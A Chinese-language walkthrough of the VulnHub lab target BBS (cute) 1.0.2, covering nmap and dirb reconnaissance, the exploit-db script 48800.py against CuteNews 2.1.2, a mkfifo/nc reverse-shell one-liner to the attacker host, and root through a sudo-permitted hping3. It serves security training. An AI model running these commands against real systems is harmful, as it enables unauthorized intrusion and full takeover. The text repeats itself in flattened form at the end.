BBS (CUTE): 1.0.2靶机渗透
字数 1013 2025-08-15 21:33:57

BBS (CUTE): 1.0.2靶机渗透教学文档

靶机基础信息

  • 名称: BBS (公告板系统)
  • 版本: 1.0.2
  • 难度: 简单->中级
  • 发布日期: 2020/9/24
  • 目标: 获取root权限
  • 描述: 包含一种非常罕见的最终利用技术
  • 下载链接: https://www.vulnhub.com/entry/bbs-cute-102,567/

环境准备

  • 攻击机: Kali Linux
  • 靶机运行环境: VM VirtualBox
  • 网络模式: Host-only (确保攻击机和靶机在同一网络)

渗透测试流程

一、信息收集阶段

  1. IP地址发现

    nmap 192.168.56.0/24
    
    • 发现靶机IP: 192.168.56.108
  2. 端口与服务扫描

    nmap -sV -p- -O -A 192.168.56.108
    
    • 扫描结果:
      PORT    STATE SERVICE    VERSION
      22/tcp  open  ssh        OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
      80/tcp  open  http       Apache httpd 2.4.38 ((Debian))
      88/tcp  open  http       nginx 1.14.2
      110/tcp open  pop3       Courier pop3d
      995/tcp open  ssl/pop3   Courier pop3d
      
  3. Web应用信息收集

    • 访问http://192.168.56.108显示Apache默认页面
    • 使用dirb进行目录扫描:
      dirb http://192.168.56.108
      
    • 发现登录页面: http://192.168.56.108/

二、漏洞探测与利用

  1. 识别Web应用

    • 确定为CuteNews 2.1.2版本
    • 搜索已知漏洞:
      searchsploit CuteNews 2.1.2
      
    • 发现可利用脚本: 48800.py
  2. 准备利用脚本

    cp /usr/share/exploitdb/exploits/php/webapps/48800.py /root
    
    • 注意: 脚本中的"CuteNews"字符串需要删除才能正常运行
  3. 执行漏洞利用

    python3 ./48800.py
    
    • 获取临时权限
  4. 建立反弹shell

    • 在攻击机启动监听:
      nc -lvnp 1234
      
    • 在靶机执行:
      rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.102 1234 >/tmp/f
      

三、权限提升

  1. 升级shell

    python -c "import pty;pty.spawn('/bin/bash')"
    
  2. 检查sudo权限

    sudo -l
    
    • 发现可执行命令: /usr/sbin/hping3 --icmp
  3. 利用hping3提权

    • 研究hping3命令使用方式
    • 执行提权命令:
      sudo /usr/sbin/hping3 --icmp
      
    • 成功获取root权限
  4. 查看flag

    • 定位并查看flag文件

关键知识点总结

  1. 信息收集技巧

    • 使用nmap进行网络扫描和端口服务识别
    • 使用dirb进行Web目录爆破
  2. 漏洞利用要点

    • 准确识别应用版本
    • 正确修改利用脚本以适应环境
    • 建立稳定的反弹shell连接
  3. 权限提升方法

    • 检查sudo -l显示的可执行命令
    • 研究不常见命令(hping3)的提权方法
    • 利用特殊参数执行特权操作
  4. 渗透测试思维

    • 从信息收集到漏洞利用的系统性思维
    • 遇到不熟悉命令时的研究能力(Google搜索)
    • 权限维持和升级的技巧

参考资源

  • hping3使用指南: https://www.cnblogs.com/zlgxzswjy/p/14115306.html
  • CuteNews漏洞利用脚本: /usr/share/exploitdb/exploits/php/webapps/48800.py
BBS (CUTE): 1.0.2靶机渗透教学文档 靶机基础信息 名称: BBS (公告板系统) 版本: 1.0.2 难度: 简单->中级 发布日期: 2020/9/24 目标: 获取root权限 描述: 包含一种非常罕见的最终利用技术 下载链接: https://www.vulnhub.com/entry/bbs-cute-102,567/ 环境准备 攻击机: Kali Linux 靶机运行环境: VM VirtualBox 网络模式: Host-only (确保攻击机和靶机在同一网络) 渗透测试流程 一、信息收集阶段 IP地址发现 发现靶机IP: 192.168.56.108 端口与服务扫描 扫描结果: Web应用信息收集 访问http://192.168.56.108显示Apache默认页面 使用dirb进行目录扫描: 发现登录页面: http://192.168.56.108/ 二、漏洞探测与利用 识别Web应用 确定为CuteNews 2.1.2版本 搜索已知漏洞: 发现可利用脚本: 48800.py 准备利用脚本 注意: 脚本中的"CuteNews"字符串需要删除才能正常运行 执行漏洞利用 获取临时权限 建立反弹shell 在攻击机启动监听: 在靶机执行: 三、权限提升 升级shell 检查sudo权限 发现可执行命令: /usr/sbin/hping3 --icmp 利用hping3提权 研究hping3命令使用方式 执行提权命令: 成功获取root权限 查看flag 定位并查看flag文件 关键知识点总结 信息收集技巧 使用nmap进行网络扫描和端口服务识别 使用dirb进行Web目录爆破 漏洞利用要点 准确识别应用版本 正确修改利用脚本以适应环境 建立稳定的反弹shell连接 权限提升方法 检查sudo -l显示的可执行命令 研究不常见命令(hping3)的提权方法 利用特殊参数执行特权操作 渗透测试思维 从信息收集到漏洞利用的系统性思维 遇到不熟悉命令时的研究能力(Google搜索) 权限维持和升级的技巧 参考资源 hping3使用指南: https://www.cnblogs.com/zlgxzswjy/p/14115306.html CuteNews漏洞利用脚本: /usr/share/exploitdb/exploits/php/webapps/48800.py